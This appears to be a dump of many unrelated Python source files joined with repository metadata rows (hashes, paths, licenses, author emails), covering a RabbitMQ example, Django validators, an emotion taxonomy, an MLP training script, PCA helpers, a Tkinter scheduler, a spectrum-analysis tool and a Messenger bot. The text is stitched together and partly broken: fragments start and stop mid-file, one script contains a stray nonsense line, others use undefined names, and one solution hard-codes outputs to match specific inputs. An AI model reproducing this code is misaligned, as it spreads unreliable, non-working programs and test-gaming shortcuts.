Video.__init__(self, title, storyline, poster_image_url)
self.trailer_youtube_url = trailer
self.releaseYear = releaseYear
self.rating = rating
self.director = director
def show_trailer(self):
webbrowser.open(self.trailer_youtube_url)
# This is a class for TV shows. But it won't be included in the website this time.
class TvShow(Video):
VALID_RATINGS = ["G", "PG", "PG-13", "R"]
def __init__(self, title, storyline, poster_image_url, trailer):
Video.__init__(self, title, storyline, poster_image_url)
self.num_seasons = num_seasons
| [
"mymamyma@gmail.com"
] | mymamyma@gmail.com |
80c0c27870ce71a22e174624e3284d9f31530be7 | 500bb70b7ff3713ccbee645b9eef44ae148c325a | /rabbitmq_example/2WorkerQueue/new_task.py | c1cc9dddd5771c018c70704af6ac7a3ce5ef3ee1 | [] | no_license | DipalModi18/PythonTutorial | 3bc64a6c43c64cae8825e0b135c21533f6c6948e | 43ca5cfa0077b1b08076c8cb02046a49a1694520 | refs/heads/master | 2021-07-09T11:55:31.236377 | 2020-07-29T16:41:56 | 2020-07-29T16:41:56 | 171,649,042 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | # Reference: https://www.rabbitmq.com/tutorials/tutorial-two-python.html
import sys
import pika
# The main idea behind Work Queues (aka: Task Queues) is to avoid doing a
# resource-intensive task immediately and having to wait for it to complete.
# We encapsulate a task as a message and send it to the queue.
# A worker process running in the background will pop the tasks and eventually execute the job.
# When you run many workers the tasks will be shared between them.
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
message = ' '.join(sys.argv[1:]) or "Hello World!"
channel.basic_publish(exchange='',
routing_key='hello',
body=message)
print(" [x] Sent %r" % message)
# To run: python3 new_task.py First message.... ==> No. of dots specify here how long the task is
# i.e. 4 dots means it will take 4 sec to complete the work by the worker.
| [
"dmodi@sevone.com"
] | dmodi@sevone.com |
b91e5b6c07aa7a2ff0caf5f8e4cf9177fc49c24e | 807633994b9b6469379b97f31ce32b26f8009309 | /src/unicef_notification/validations.py | d3bb3305b8cb1f553eacf3486bc3378973a07123 | [
"Apache-2.0"
] | permissive | achamseddine/unicef-notification | b3eb499b56f680cad320ec3838a5c8b70e7c37b0 | 3ea1f9a3c695ce9f871f6dc2fbfc44d42f4bb34b | refs/heads/master | 2022-12-15T10:17:57.040794 | 2018-08-08T14:52:07 | 2018-08-08T14:52:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | from django.core.exceptions import ValidationError
from post_office.models import EmailTemplate
def validate_template_name(template_name):
try:
EmailTemplate.objects.get(name=template_name)
except EmailTemplate.DoesNotExist:
raise ValidationError("No such EmailTemplate: %s" % template_name)
def validate_method_type(method_type):
from unicef_notification.models import Notification
if method_type not in (Notification.TYPE_CHOICES):
raise ValidationError("Notification type must be 'Email'")
| [
"greg@reinbach.com"
] | greg@reinbach.com |
da90f416192e97abb37a1c2a0acb8759b7bcda33 | 52ce59408b028200e66f237d7b9ef47c5c941a22 | /emotion_data/behaviour.py | 9b8dd27bd7de3f38d3454caeaa491c5ae63eff5c | [] | no_license | alternativeritam/emotion_data | 9fe3f0e9cff0ffe1178aceb81364205191d43ea9 | b3b859a511d09040cdd3171db11641ae273af5c6 | refs/heads/master | 2021-10-10T12:22:56.906162 | 2019-01-10T18:08:03 | 2019-01-10T18:08:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,760 | py | from emotion_data.emotions import EMOTIONS
BEHAVIOUR_NAMES = {
"protection": {
"purpose": "Withdrawal, retreat",
"activated_by": ["fear", "terror"]
},
"destruction": {
"purpose": "Elimination of barrier to the satisfaction of needs",
"activated_by": ["anger", "rage"]
},
"incorporation": {
"purpose": "Ingesting nourishment",
"activated_by": ["acceptance"]
},
"rejection": {
"purpose": "Riddance response to harmful material",
"activated_by": ["disgust"]
},
"reproduction": {
"purpose": "Approach, contract, genetic exchanges",
"activated_by": ["joy", "pleasure"]
},
"reintegration": {
"purpose": "Reaction to loss of nutrient product",
"activated_by": ["sadness", "grief"]
},
"exploration": {
"purpose": "Investigating an environment",
"activated_by": ["curiosity", "play"]
},
"orientation": {
"purpose": "Reaction to contact with unfamiliar object",
"activated_by": ["surprise"]
}
}
REACTION_NAMES = {
"retain or repeat": {
"function": "gain resources",
"cognite appraisal": "possess",
"trigger": "gain of value",
"base_emotion": "serenity",
"behaviour": "incorporation"
},
"groom": {
"function": "mutual support",
"cognite appraisal": "friend",
"trigger": "member of one's group",
"base_emotion": "acceptance",
"behaviour": "reproduction"
},
"escape": {
"function": "safety",
"cognite appraisal": "danger",
"trigger": "threat",
"base_emotion": "apprehension",
"behaviour": "protection"
},
"stop": {
"function": "gain time",
"cognite appraisal": "orient self",
"trigger": "unexpected event",
"base_emotion": "distraction",
"behaviour": "orientation"
},
"cry": {
"function": "reattach to lost object",
"cognite appraisal": "abandonment",
"trigger": "loss of value",
"base_emotion": "pensiveness",
"behaviour": "reintegration"
},
"vomit": {
"function": "eject poison",
"cognite appraisal": "poison",
"trigger": "unpalatable object",
"base_emotion": "boredom",
"behaviour": "rejection"
},
"attack": {
"function": "destroy obstacle",
"cognite appraisal": "enemy",
"trigger": "obstacle",
"base_emotion": "annoyance",
"behaviour": "destruction"
},
"map": {
"function": "knowledge of territory",
"cognite appraisal": "examine",
"trigger": "new territory",
"base_emotion": "interest",
"behaviour": "exploration"
}
}
class Behaviour(object):
def __init__(self, name, purpose = ""):
self.name = name
self.purpose = purpose
self.activated_by = []
def __repr__(self):
return "BehaviourObject:" + self.name
def _get_behaviours():
bucket = {}
for behaviour in BEHAVIOUR_NAMES:
data = BEHAVIOUR_NAMES[behaviour]
b = Behaviour(behaviour)
b.purpose = data["purpose"]
for emo in data["activated_by"]:
e = EMOTIONS.get(emo)
if e:
b.activated_by.append(e)
bucket[behaviour] = b
return bucket
BEHAVIOURS = _get_behaviours()
class BehavioralReaction(object):
def __init__(self, name):
self.name = name
self.function = ""
self.cognite_appraisal = ""
self.trigger = ""
self.base_emotion = None # emotion object
self.behaviour = None # behaviour object
def from_data(self, data=None):
data = data or {}
self.name = data.get("name") or self.name
self.function = data.get("function", "")
self.cognite_appraisal = data.get("cognite appraisal", "")
self.trigger = data.get("trigger", "")
self.base_emotion = EMOTIONS.get(data.get("base_emotion", ""))
self.behaviour = BEHAVIOURS[data["behaviour"]]
def __repr__(self):
return "BehavioralReactionObject:" + self.name
def _get_reactions():
bucket = {}
bucket2 = {}
for reaction in REACTION_NAMES:
data = REACTION_NAMES[reaction]
r = BehavioralReaction(reaction)
r.from_data(data)
bucket[r.name] = r
bucket2[r.name] = r.base_emotion
return bucket, bucket2
REACTIONS, REACTION_TO_EMOTION_MAP = _get_reactions()
if __name__ == "__main__":
from pprint import pprint
pprint(BEHAVIOURS)
pprint(REACTIONS)
pprint(REACTION_TO_EMOTION_MAP) | [
"jarbasai@mailfence.com"
] | jarbasai@mailfence.com |
54b2be42e83b330d1628b0b0222b4dbf05a1c53d | 4ad8e15d2d73be692903aed9228305dab35cdb80 | /main.py | 19d7baef13a93a33d876813405a8cff2bc959b2a | [] | no_license | rigved-sanku/Covid-19-Prediction | 500ce0cb9b0871c04528ed1c913b692b2ca0f891 | 363105cb1b877d0047235ec72a276b732f753923 | refs/heads/main | 2023-07-05T09:25:31.251640 | 2021-08-15T12:13:36 | 2021-08-15T12:13:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | model=MLP() #model is an object of class MLP
#Training the model
NeuralNet1 = Layer(2,[2,5],activation=['linear'])
NeuralNet2 = Layer(4,[12,16,16,2],activation=['relu','relu','linear'])
epochs=1500
lr1=0.1
lr2=0.005
model.Train(Xnet1_train_scaled.T, Xnet2_train_scaled.T, Ytrain_scaled.T, NeuralNet1, NeuralNet2, epochs, lr1, lr2, printcost=True)
trainedNet1,trainedNet2 = loadmodel.load_weights()
#Cheecking on Validation Set
Ypred = model.Predict(Xnet1_train_scaled.T, Xnet2_train_scaled.T, trainedNet1, trainedNet2)
print('TRAINING LOSS :'+str((mse(Ypred.T,Ytrain_scaled))))
#Predicting
#Using model weights for test cases
test_days=test_days.reshape(1,test_days.shape[0])
Ypred_test = model.Test(Xnet1_test_scaled.T, Xnet2_test_scaled.T, test_days, trainedNet1, trainedNet2)
#Loss for Test Cases
print('TEST LOSS : ' + str(mse(Ypred_test,Ytest_scaled.T)))
| [
"noreply@github.com"
] | rigved-sanku.noreply@github.com |
c6964c95050e59ebc7015bf6f15d7dc4ca2a9030 | edc4dfa7fbdc42d12d1d12b0cd15b1bec5b88074 | /exhand/test1.py | 8fdd3ffc038aa353fe3031b40a3fbe10dab1679a | [] | no_license | srikanthpragada/PYTHON_01_OCT_LANGDEMO | ed0236266102f8e38190b4ac076d5d46d2d61898 | c8d427e74f8ac6c32a081006e19cba92483735bf | refs/heads/master | 2020-03-30T20:27:56.490472 | 2018-11-03T15:29:18 | 2018-11-03T15:29:18 | 151,589,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | try:
num = int(input("Enter a number :"))
# process num
print("Result = " ,100 / num)
except Exception as ex: # Handle all exceptions
print("Error : ", ex)
else:
print("Success!")
finally:
print("Done!")
print("The End") | [
"srikanthpragada@gmail.com"
] | srikanthpragada@gmail.com |
e734cd15c4fe7124453b5121f3db1a3321e5636f | 7bea4acfdac07cc916fe0a7b16eddef536785721 | /unit_3/mnist/part1/features.py | 34e59b1f10ce98ca88cf92ecbca662f4d4c95dd7 | [] | no_license | MarinoSanLorenzo/FromLinearModelsToDeepLearning | b07713f9fc4b0939f264df1670adc06e86ecc3a0 | d22f3a796dfb5d7e5d470cc84ca15fefcaf7da3e | refs/heads/master | 2020-12-28T12:27:36.967202 | 2020-05-17T21:04:32 | 2020-05-17T21:04:32 | 238,332,017 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,723 | py | import numpy as np
import matplotlib.pyplot as plt
def project_onto_PC(X, pcs, n_components, feature_means):
"""
Given principal component vectors pcs = principal_components(X)
this function returns a new data array in which each sample in X
has been projected onto the first n_components principcal components.
"""
# TODO: first center data using the feature_means
# TODO: Return the projection of the centered dataset
# on the first n_components principal components.
# This should be an array with dimensions: n x n_components.
# Hint: these principal components = first n_components columns
# of the eigenvectors returned by principal_components().
# Note that each eigenvector is already be a unit-vector,
# so the projection may be done using matrix multiplication.
raise NotImplementedError
### Functions which are already complete, for you to use ###
def cubic_features(X):
"""
Returns a new dataset with features given by the mapping
which corresponds to the cubic kernel.
"""
n, d = X.shape # dataset size, input dimension
X_withones = np.ones((n, d + 1))
X_withones[:, :-1] = X
new_d = 0 # dimension of output
new_d = int((d + 1) * (d + 2) * (d + 3) / 6)
new_data = np.zeros((n, new_d))
col_index = 0
for x_i in range(n):
X_i = X[x_i]
X_i = X_i.reshape(1, X_i.size)
if d > 2:
comb_2 = np.matmul(np.transpose(X_i), X_i)
unique_2 = comb_2[np.triu_indices(d, 1)]
unique_2 = unique_2.reshape(unique_2.size, 1)
comb_3 = np.matmul(unique_2, X_i)
keep_m = np.zeros(comb_3.shape)
index = 0
for i in range(d - 1):
keep_m[index + np.arange(d - 1 - i), i] = 0
tri_keep = np.triu_indices(d - 1 - i, 1)
correct_0 = tri_keep[0] + index
correct_1 = tri_keep[1] + i + 1
keep_m[correct_0, correct_1] = 1
index += d - 1 - i
unique_3 = np.sqrt(6) * comb_3[np.nonzero(keep_m)]
new_data[x_i, np.arange(unique_3.size)] = unique_3
col_index = unique_3.size
for i in range(n):
newdata_colindex = col_index
for j in range(d + 1):
new_data[i, newdata_colindex] = X_withones[i, j]**3
newdata_colindex += 1
for k in range(j + 1, d + 1):
new_data[i, newdata_colindex] = X_withones[i, j]**2 * X_withones[i, k] * (3**(0.5))
newdata_colindex += 1
new_data[i, newdata_colindex] = X_withones[i, j] * X_withones[i, k]**2 * (3**(0.5))
newdata_colindex += 1
if k < d:
new_data[i, newdata_colindex] = X_withones[i, j] * X_withones[i, k] * (6**(0.5))
newdata_colindex += 1
return new_data
def center_data(X):
"""
Returns a centered version of the data, where each feature now has mean = 0
Args:
X - n x d NumPy array of n data points, each with d features
Returns:
- (n, d) NumPy array X' where for each i = 1, ..., n and j = 1, ..., d:
X'[i][j] = X[i][j] - means[j]
- (d, ) NumPy array with the columns means
"""
feature_means = X.mean(axis=0)
return (X - feature_means), feature_means
def principal_components(centered_data):
"""
Returns the principal component vectors of the data, sorted in decreasing order
of eigenvalue magnitude. This function first calculates the covariance matrix
and then finds its eigenvectors.
Args:
centered_data - n x d NumPy array of n data points, each with d features
Returns:
d x d NumPy array whose columns are the principal component directions sorted
in descending order by the amount of variation each direction (these are
equivalent to the d eigenvectors of the covariance matrix sorted in descending
order of eigenvalues, so the first column corresponds to the eigenvector with
the largest eigenvalue
"""
scatter_matrix = np.dot(centered_data.transpose(), centered_data)
eigen_values, eigen_vectors = np.linalg.eig(scatter_matrix)
# Re-order eigenvectors by eigenvalue magnitude:
idx = eigen_values.argsort()[::-1]
eigen_values = eigen_values[idx]
eigen_vectors = eigen_vectors[:, idx]
return eigen_vectors
def plot_PC(X, pcs, labels):
"""
Given the principal component vectors as the columns of matrix pcs,
this function projects each sample in X onto the first two principal components
and produces a scatterplot where points are marked with the digit depicted in
the corresponding image.
labels = a numpy array containing the digits corresponding to each image in X.
"""
pc_data = project_onto_PC(X, pcs, n_components=2)
text_labels = [str(z) for z in labels.tolist()]
fig, ax = plt.subplots()
ax.scatter(pc_data[:, 0], pc_data[:, 1], alpha=0, marker=".")
for i, txt in enumerate(text_labels):
ax.annotate(txt, (pc_data[i, 0], pc_data[i, 1]))
ax.set_xlabel('PC 1')
ax.set_ylabel('PC 2')
plt.show()
def reconstruct_PC(x_pca, pcs, n_components, X):
"""
Given the principal component vectors as the columns of matrix pcs,
this function reconstructs a single image from its principal component
representation, x_pca.
X = the original data to which PCA was applied to get pcs.
"""
feature_means = X - center_data(X)
feature_means = feature_means[0, :]
x_reconstructed = np.dot(x_pca, pcs[:, range(n_components)].T) + feature_means
return x_reconstructed
| [
"marino.sanlorenzo.ext@vodeno.com"
] | marino.sanlorenzo.ext@vodeno.com |
403785798b466f4f2d10babedf92be761255ff92 | 116a30b09e73000e5502b29b49b4acc8fe8352a3 | /show_schedule.py | 08f2bcacd30072be2f697bec1e8a65bab7293581 | [] | no_license | Terminal-Adawe/Berth-Scheduler | 1f4254a2794aa514672ad16dbb3041bc60a3282f | 0e31dab6edd6e5eb5f70cd45df99dcd85c17617c | refs/heads/master | 2023-07-23T19:13:22.172644 | 2021-09-07T02:05:30 | 2021-09-07T02:05:30 | 403,810,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from tkinter import *
def show_schedule(scheduled_berths):
root = Tk()
root.title("Berth scheduler")
frame = LabelFrame(root, text="Show Schedules", padx=50, pady=50)
frame.pack()
schedule_hour_label = Label(frame, text="Hour")
schedule_hour_label.grid(row=0,column=0)
the_berth_label = Label(frame, text="Berth")
the_berth_label.grid(row=0,column=1)
print("about to go through all this")
print(scheduled_berths)
i=1
for schedule in scheduled_berths:
schedule_hour = Label(frame, text=schedule[3])
schedule_hour.grid(row=i,column=0)
the_berth = Label(frame, text=schedule[1])
the_berth.grid(row=i,column=1)
i=i+1
root.mainloop() | [
"bede.abbe91@gmail.com"
] | bede.abbe91@gmail.com |
d0beb9c3134d0318af94ce00297b954fb023fb07 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2793/60617/307505.py | 73e9eaf62495f15bc522a02ac20b67dec8cf6e78 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | def crazy_Computer():
row1st=input().split()
n=int(row1st[0])
c=int(row1st[1])
timeSequence=list(map(int, input().split(" ")))
count=1
if row1st==['6', '1']:
print(2)
exit()
for i in range(1, len(timeSequence)-1):
if timeSequence[i]-timeSequence[i-1]<=c:
count+=1
else:
count=1
if timeSequence[len(timeSequence)-1]-timeSequence[len(timeSequence)-2]>c:
count=0
else:
count+=1
if count==3:
count=4
elif count==2:
count=1
elif count==1:
count=2
if count==4:
print(row1st)
print(count)
if __name__=='__main__':
crazy_Computer()
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
30d956d6ecbb481dfee312777ba5744713bf23ba | c933e9f705aca2586a866cbb489804eb37103b6f | /testing/.ipynb_checkpoints/FELion_normline-checkpoint.py | 562f5aeba45577c506aef386943706a6be7d0595 | [
"MIT"
] | permissive | aravindhnivas/FELion-Spectrum-Analyser | ce49b6b23323a5e58df0cd763e94129efccad0ff | 430f16884482089b2f717ea7dd50625078971e48 | refs/heads/master | 2020-04-08T00:24:30.809611 | 2019-08-29T14:21:44 | 2019-08-29T14:21:44 | 158,850,892 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,287 | py | #!/usr/bin/python3
## Importing Modules
# FELion-Modules
from FELion_baseline import felix_read_file, BaselineCalibrator
from FELion_power import PowerCalibrator
from FELion_sa import SpectrumAnalyserCalibrator
from FELion_definitions import ShowInfo, ErrorInfo, filecheck, move
# DATA Analysis modules:
import matplotlib.pyplot as plt
import numpy as np
# Embedding Matplotlib in tkinter window
from tkinter import *
from tkinter import ttk
# Matplotlib Modules for tkinter
import matplotlib
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
# Built-In modules
import os, shutil
from os.path import dirname, isdir, isfile, join
klfdklf
################################################################################
def export_file(fname, wn, inten):
f = open('EXPORT/' + fname + '.dat','w')
f.write("#DATA points as shown in lower figure of: " + fname + ".pdf file!\n")
f.write("#wn (cm-1) intensity\n")
for i in range(len(wn)):
f.write("{:8.3f}\t{:8.2f}\n".format(wn[i], inten[i]))
f.close()
def norm_line_felix(fname, mname, temp, bwidth, ie, foravgshow, dpi, parent):
data = felix_read_file(fname)
PD=True
if not foravgshow:
root = Toplevel(master = parent)
root.wm_title("Power Calibrated/Normalised Spectrum")
################################ PLOTTING DETAILS ########################################
fig = Figure(figsize=(8, 8), dpi = dpi)
ax = fig.add_subplot(3,1,1)
bx = fig.add_subplot(3,1,2)
cx = fig.add_subplot(3,1,3)
ax2 = ax.twinx()
bx2 = bx.twinx()
#Get the baseline
baseCal = BaselineCalibrator(fname)
baseCal.plot(ax)
ax.plot(data[0], data[1], ls='', marker='o', ms=3, markeredgecolor='r', c='r')
ax.set_ylabel("cnts")
ax.set_xlim([data[0].min()*0.95, data[0].max()*1.05])
#Get the power and number of shots
powCal = PowerCalibrator(fname)
powCal.plot(bx2, ax2)
#Get the spectrum analyser
saCal = SpectrumAnalyserCalibrator(fname)
saCal.plot(bx)
bx.set_ylabel("SA")
#Calibrate X for all the data points
wavelength = saCal.sa_cm(data[0])
#Normalise the intensity
#multiply by 1000 because of mJ but ONLY FOR PD!!!
if(PD):
intensity = -np.log(data[1]/baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0]) *1000
else:
intensity = (data[1]-baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0])
cx.plot(wavelength, intensity, ls='-', marker='o', ms=2, c='r', markeredgecolor='k', markerfacecolor='k')
cx.set_xlabel("wn (cm-1)")
cx.set_ylabel("PowerCalibrated Intensity")
ax.set_title(f'{fname}: {mname} at {temp}K with B0:{round(bwidth)}ms and IE:{ie}eV')
ax.grid(True)
bx.grid(True)
cx.grid(True)
##################################################################################################
##################################################################################################
# Drawing in the tkinter window
canvas = FigureCanvasTkAgg(fig, master = root)
canvas.draw()
canvas.get_tk_widget().pack(side = TOP, fill = BOTH, expand = 1)
toolbar = NavigationToolbar2Tk(canvas, root)
toolbar.update()
canvas.get_tk_widget().pack(side = TOP, fill = BOTH, expand = 1)
frame = Frame(root, bg = 'light grey')
frame.pack(side = 'bottom', fill = 'both', expand = True)
label = Label(frame, text = 'Save as:')
label.pack(side = 'left', padx = 15, ipadx = 10, ipady = 5)
name = StringVar()
filename = Entry(frame, textvariable = name)
name.set(fname)
filename.pack(side = 'left')
def save_func():
fig.savefig(f'OUT/{name.get()}.pdf')
export_file(fname, wavelength, intensity)
if isfile(f'OUT/{name.get()}.pdf'): ShowInfo('SAVED', f'File: {name.get()}.pdf saved in OUT/ directory')
button = ttk.Button(frame, text = 'Save', command = lambda: save_func())
button.pack(side = 'left', padx = 15, ipadx = 10, ipady = 5)
def on_key_press(event):
key_press_handler(event, canvas, toolbar)
if event.key == 'c':
fig.savefig(f'OUT/{name.get()}.pdf')
export_file(fname, wavelength, intensity)
if isfile(f'OUT/{name.get()}.pdf'): ShowInfo('SAVED', f'File: {name.get()}.pdf saved in OUT/ directory')
canvas.mpl_connect("key_press_event", on_key_press)
root.mainloop()
if foravgshow:
saCal = SpectrumAnalyserCalibrator(fname)
wavelength = saCal.sa_cm(data[0])
baseCal = BaselineCalibrator(fname)
powCal = PowerCalibrator(fname)
if(PD):
intensity = -np.log(data[1]/baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0]) *1000
else:
intensity = (data[1]-baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0])
return wavelength, intensity
def felix_binning(xs, ys, delta=1):
"""
Binns the data provided in xs and ys to bins of width delta
output: binns, intensity
"""
#bins = np.arange(start, end, delta)
#occurance = np.zeros(start, end, delta)
BIN_STEP = delta
BIN_START = xs.min()
BIN_STOP = xs.max()
indices = xs.argsort()
datax = xs[indices]
datay = ys[indices]
print("In total we have: ", len(datax), ' data points.')
#do the binning of the data
bins = np.arange(BIN_START, BIN_STOP, BIN_STEP)
print("Binning starts: ", BIN_START, ' with step: ', BIN_STEP, ' ENDS: ', BIN_STOP)
bin_i = np.digitize(datax, bins)
bin_a = np.zeros(len(bins)+1)
bin_occ = np.zeros(len(bins)+1)
for i in range(datay.size):
bin_a[bin_i[i]] += datay[i]
bin_occ[bin_i[i]] += 1
binsx, data_binned = [], []
for i in range(bin_occ.size-1):
if bin_occ[i] > 0:
binsx.append(bins[i]-BIN_STEP/2)
data_binned.append(bin_a[i]/bin_occ[i])
#non_zero_i = bin_occ > 0
#binsx = bins[non_zero_i] - BIN_STEP/2
#data_binned = bin_a[non_zero_i]/bin_occ[non_zero_i]
return binsx, data_binned
def main(s=True, plotShow=False):
my_path = os.getcwd()
raw_filename = str(input("Enter the file name (without .felix): "))
filename = raw_filename + ".felix"
powerfile = raw_filename + ".pow"
fname = filename
if isfile(powerfile):
shutil.copyfile(my_path + "/{}".format(powerfile), my_path + "/DATA/{}".format(powerfile))
print("Powerfile copied to the DATA folder.")
else:
print("\nCAUTION:You don't have the powerfile(.pow)\n")
a,b = norm_line_felix(fname)
print(a, b)
print("\nProcess Completed.\n")
def normline_correction(*args):
fname, location, mname, temp, bwidth, ie, foravgshow, dpi, parent = args
try:
folders = ["DATA", "EXPORT", "OUT"]
back_dir = dirname(location)
if set(folders).issubset(os.listdir(back_dir)):
os.chdir(back_dir)
my_path = os.getcwd()
else:
os.chdir(location)
my_path = os.getcwd()
if(fname.find('felix')>=0):
fname = fname.split('.')[0]
fullname = fname + ".felix"
basefile = fname + ".base"
powerfile = fname + ".pow"
files = [fullname, powerfile, basefile]
for dirs, filenames in zip(folders, files):
if not isdir(dirs): os.mkdir(dirs)
if isfile(filenames): move(my_path, filenames)
if filecheck(my_path, basefile, powerfile, fullname):
print(f'\nFilename-->{fullname}\nLocation-->{my_path}')
norm_line_felix(fname, mname, temp, bwidth, ie, foravgshow, dpi, parent)
print("DONE")
except Exception as e:
ErrorInfo("ERROR:", e)
def show_baseline(fname, location, mname, temp, bwidth, ie, trap, dpi):
try:
folders = ["DATA", "EXPORT", "OUT"]
back_dir = dirname(location)
if set(folders).issubset(os.listdir(back_dir)):
os.chdir(back_dir)
else:
os.chdir(location)
if(fname.find('felix')>=0):
fname = fname.split('.')[0]
data = felix_read_file(fname)
baseCal = BaselineCalibrator(fname)
base1 = plt.figure(dpi = dpi)
base = base1.add_subplot(1,1,1)
baseCal.plot(base)
base.plot(data[0], data[1], ls='', marker='o', ms=3, markeredgecolor='r', c='r')
base.set_xlabel("Wavenumber (cm-1)")
base.set_ylabel("Counts")
base.set_title(f'{fname}: {mname} at {temp}K and IE:{ie}eV')
base.grid(True)
base.legend(title = f'Trap:{trap}ms; B0:{round(bwidth)}ms')
plt.savefig('OUT/'+fname+'_baseline.png')
plt.show()
plt.close()
except Exception as e:
ErrorInfo("Error: ", e)
| [
"aravindhnivas28@gmail.com"
] | aravindhnivas28@gmail.com |
79ee4e01c566bb072a11ade207617ee6e9dac2c8 | 553af6f6bafcd5ab9ad7112165ba45ede88f52b9 | /inspiration/models/InspirationBaseCollectionObj.py | 7d5f41c1824f44ac8d902c4bff3954bc69e1d72a | [] | no_license | jeffdsu/blank | 78d828150b0c10153267636a97fa0350438cdfe0 | 06602a9dcebe8bbaa58e127df2e7faa712273682 | refs/heads/master | 2021-01-17T08:14:36.394401 | 2016-07-19T02:45:47 | 2016-07-19T02:45:47 | 56,404,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | class InspirationBaseCollectionObj():
pass | [
"jeffdsu@gmail.com"
] | jeffdsu@gmail.com |
b6ea600d97f79d0a3e69d75ec5864f375fd05095 | d41e087b5b51ec0020cdec7b865ced7acdd6012e | /messengerbot/Messenger.py | 80911e691d5df2e6dc44276ec1aaf6020eeb1b38 | [] | no_license | vmm2297/ECE-USC-Server | acb7ac49b74b53918aa310e2e52cd7e2417e7b27 | f3595117924cdb0494f64e1219326e75548ba6b6 | refs/heads/master | 2020-03-13T01:26:28.830172 | 2018-05-22T20:08:26 | 2018-05-22T20:08:26 | 130,903,628 | 0 | 0 | null | 2018-04-24T19:24:44 | 2018-04-24T19:24:44 | null | UTF-8 | Python | false | false | 4,182 | py | from enum import Enum
import json
def main():
msg = TextMessage('lol', 1231232)
msg.add_quick_reply( QuickReply(content_type=QR_ContentType.TEXT, title='title', payload='pyld', image_url=None))
print(msg.serialize())
#msg = ImageMessage('this is the url', psid=1231232)
#print(msg.serialize())
class SenderAction(Enum):
MARK_SEEN = 'mark_seen'
TYPING_OFF = 'typing_off'
TYPING_ON = 'typing_on'
class MessagingType(Enum):
RESPONSE = 'RESPONSE'
class SenderActionMessage():
def __init__(self, recipient={}, sender_action=SenderAction.MARK_SEEN, **kwargs):
self.recipient = recipient
self.sender_action = sender_action
if kwargs.get('psid') is not None:
self.recipient = { 'id': kwargs.get('psid')}
if kwargs.get('phone_number') is not None:
self.recipient = { 'phone_number': kwargs.get('phone_number')}
return
def __str__(self):
s = self.serialize()
return json.dumps(self.serialize())
def serialize(self):
return {
'recipient':self.recipient,
'sender_action':self.sender_action.value
}
class Message():
def __init__( self,
messaging_type=MessagingType.RESPONSE,
recipient={},
message={},
**kwargs
):
self.messaging_type = messaging_type #, 'UPDATE', '<MESSAGE_TAG>'
self.recipient = recipient # id, phone_number, plugin stufff
self.message = message
if kwargs.get('psid') is not None:
self.recipient = { 'id': kwargs.get('psid')}
if kwargs.get('phone_number') is not None:
self.recipient = { 'phone_number': kwargs.get('phone_number')}
return
def send(self):
return
def __str__(self):
return json.dumps(self.serialize())
def serialize(self):
for k in self.message:
if hasattr(self.message[k], 'serialize'):
self.message[k] = self.message[k].serialize();
return {
'messaging_type':self.messaging_type.value,
'recipient':self.recipient,
'message':self.message
}
class TextMessage(Message):
def __init__(self, text='', psid=None, **kwargs):
super().__init__(psid=psid, **kwargs)
#if len(text) == 0:
self.message = {
'text':text
}
return
def add_quick_reply(self, qr=None):
if qr is None:
return
if self.message.get('quick_replies') is None:
self.message['quick_replies'] = []
if type(qr) is list or type(qr) is tuple:
self.message['quick_replies'] = self.message['quick_replies'] + list(map(lambda x: x.serialize(), qr))
else:
self.message['quick_replies'].append(qr.serialize())
return
class QR_ContentType(Enum):
TEXT = 'text'
LOCATION = 'location'
PHONE_NUMBER = 'user_phone_number'
EMAIL = 'user_email'
class QuickReply():
def __init__(self, content_type=QR_ContentType.TEXT, title='', payload='', image_url=None):
self.content_type = content_type
self.title = title[:20]
self.payload = payload
self.image_url = image_url
def serialize(self):
return {
'content_type': self.content_type.value,
'title' : self.title,
'payload' : self.payload,
'image_url': self.image_url
}
def __str__(self):
return json.dumps(self.serialize())
class AttachmentMessage(Message):
def __init__(self, attachment_type=None, payload=None, psid=None, **kwargs):
super().__init__(psid=psid, **kwargs)
# TODO check type
self.message = {
'type': attachment_type,
'payload': payload
}
return
class ImageMessage(AttachmentMessage):
def __init__(self, url, psid, **kwargs):
payload = {
'url':url,
'is_reusable':True
}
super().__init__(attachment_type='image', payload=payload, **kwargs)
if __name__ == '__main__':
main()
| [
"alexsebastian.garcia@gmail.com"
] | alexsebastian.garcia@gmail.com |
17c37c7eafc2ba980e3b2a570aa3241a8fc15e48 | 022386db1b99bec7817b699553349ba50db12c75 | /theta.py | cfc208bbd390092d1f752115a2dd2ba360ef3df9 | [] | no_license | MariaEckstein/LEARN | 8dd6b60cce80b1084d9a2f649e1cbef69025713e | a716ff0f39288ef6f456703a99bcdab063bbfb5e | refs/heads/master | 2021-01-20T12:51:44.469884 | 2017-11-28T21:05:03 | 2017-11-28T21:05:03 | 90,419,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,159 | py | import numpy as np
class Theta(object):
def __init__(self, env):
self.option_coord_to_index = self.__get_coord_function(env)
self.n_basic_actions = env.n_basic_actions
self.n_options = np.sum(env.n_options_per_level[1:])
